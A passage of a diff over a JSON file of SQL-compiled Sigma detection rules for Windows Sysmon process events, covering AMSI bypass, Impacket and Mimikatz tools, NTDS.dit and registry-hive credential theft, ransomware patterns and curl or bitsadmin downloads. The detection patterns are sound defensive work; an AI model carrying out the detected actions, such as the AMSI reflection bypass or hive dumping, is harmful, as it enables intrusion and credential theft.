'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Abusing Print Executable", + "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Attackers can use print.exe for remote file copy", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_print_remote_file_copy.yml" }, { - "title": "Fsutil Behavior Set SymlinkEvaluation", - "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "title": "Python Inline Command Execution", + "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "status": "experimental", - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "author": "frack113", + "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059" ], "falsepositives": [ - "Legitimate use" + "Python libraries that use a flag starting with \"-c\". Filter according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'python.exe' OR (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" + "filename": "proc_creation_win_python_inline_command_execution.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Extexport Execution", - "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" - ], - "filename": "proc_creation_win_lolbin_extexport.yml" - }, - { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Rundll32 With Suspicious Parent Process", + "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "author": "CD_ROM_", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_rundll32_parent_explorer.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Suspicious RunAs-Like Flag Combination", - "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "title": "File Download Via Bitsadmin To An Uncommon Target Folder", + "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "status": "experimental", - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" }, { - "title": "Potential Product Class Reconnaissance Via Wmic.EXE", - "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "status": "test", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_product_class.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Password Protected Compressed File Extraction Via 7Zip", - "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", - "status": "experimental", - "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Legitimate activity is expected since extracting files with a password can be common in some environement." + "Legitimate use by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_password_extraction.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Monitoring Winget For LOLbin Execution", - "id": "313d6012-51a0-4d93-8dfc-de8553239e25", - "status": "experimental", - "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them without touching disk. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", - "author": "Sreeman, Florian Roth (Nextron Systems), Frack113", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND CommandLine LIKE '%install%' ESCAPE '\\' AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml" - }, - { - "title": "Enumeration for Credentials in Registry", - "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", - "status": "test", - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE 